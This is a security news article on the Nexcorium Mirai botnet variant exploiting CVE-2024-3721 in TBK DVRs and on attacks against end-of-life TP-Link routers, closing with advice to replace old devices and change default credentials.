Nexcorium Variant of Mirai Botnet Exploits CVE-2024-3721 to Compromise TBK DVRs and Launch DDoS Attacks

Recent investigations by Fortinet’s FortiGuard Labs and Palo Alto Networks’ Unit 42 have uncovered that cybercriminals are actively exploiting vulnerabilities in TBK DVR devices and end-of-life (EoL) TP-Link Wi-Fi routers. This exploitation enables the deployment of variants of the Mirai botnet, particularly a new variant known as Nexcorium, on compromised devices. The ramifications of these attacks are substantial, underscoring the ongoing vulnerabilities present in Internet of Things (IoT) devices and the persistent threat landscape they create.

Understanding the Vulnerability

The attacks specifically target TBK DVR devices by leveraging a command injection vulnerability identified as CVE-2024-3721, which has a CVSS score of 6.3. This medium-severity vulnerability affects the TBK DVR-4104 and DVR-4216 models, allowing attackers to deploy the Nexcorium variant of the Mirai botnet. Security researcher Vincent Li has noted that IoT devices are increasingly becoming prime targets for large-scale attacks due to their widespread use, inadequate patching, and often weak security configurations.

Li emphasized that threat actors continue to exploit known vulnerabilities to gain initial access and deploy malware capable of persisting, spreading, and causing distributed denial-of-service (DDoS) attacks.

Historical Context of the Vulnerability

CVE-2024-3721 has a history of exploitation. Over the past year, it has been used to deploy various Mirai variants and a newer botnet called RondoDox. In September 2025, CloudSEK disclosed a large-scale loader-as-a-service botnet that distributed RondoDox, Mirai, and Morte payloads through weak credentials and outdated vulnerabilities in routers, IoT devices, and enterprise applications.

The exploitation process for CVE-2024-3721 involves dropping a downloader script that initiates the botnet payload based on the architecture of the Linux system. Once executed, the malware displays a message indicating that “nexuscorp has taken control.”

Technical Details of the Nexcorium Botnet

Nexcorium shares architectural similarities with previous Mirai variants, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module. The malware also exploits CVE-2017-17215 to target Huawei HG532 devices within the network. It incorporates a list of hard-coded usernames and passwords to facilitate brute-force attacks via Telnet connections.

If successful, the malware attempts to obtain a shell, establish persistence using crontab and systemd service, and connect to an external server to await commands for launching DDoS attacks over various protocols, including UDP, TCP, and SMTP. Once it establishes persistence, the malware deletes the original downloaded binary to evade detection and analysis.

Fortinet has noted that the Nexcorium malware exhibits typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to maintain long-term access to infected systems. The use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, highlights its adaptability and effectiveness in broadening its infection reach.

Ongoing Threats and Security Measures

Unit 42 has reported active, automated scans and probes attempting to exploit CVE-2023-33538, another command injection vulnerability affecting EoL TP-Link wireless routers. Although these attempts have been flawed and unsuccessful, they confirm the existence of real vulnerabilities that can be exploited. This vulnerability was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog in June 2025 and affects several TP-Link models, including TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10.

Researchers Asher Davila, Malav Vyas, and Chris Navarrete have stated that while the in-the-wild attacks observed were flawed and would fail, their analysis confirms that the underlying vulnerability is real. Successful exploitation requires authentication to the router’s web interface, making it imperative for users to implement robust security measures.

Recommendations for Users

Given that the affected TP-Link devices are no longer actively supported, users are strongly advised to replace them with newer models and ensure that default credentials are not utilized. The persistent risk of default credentials in IoT devices continues to shape the security landscape, as these credentials can transform a limited, authenticated vulnerability into a critical entry point for determined attackers.

Unit 42 has emphasized that the security landscape will continue to be influenced by the ongoing risk of default credentials in IoT devices. As the cybersecurity landscape evolves, organizations and individuals must remain vigilant and proactive in addressing vulnerabilities in IoT devices. The exploitation of CVE-2024-3721 by the Nexcorium variant serves as a stark reminder of the ongoing challenges in securing interconnected devices.

For further insights, refer to the original reporting source: cyberwarriorsmiddleeast.com.

Explore the latest digital editions of FAME Delivered in the Magazine section: https://famedelivered.com/magazine/

Published on 2026-04-18 21:20:00 • By FAME Delivered News Desk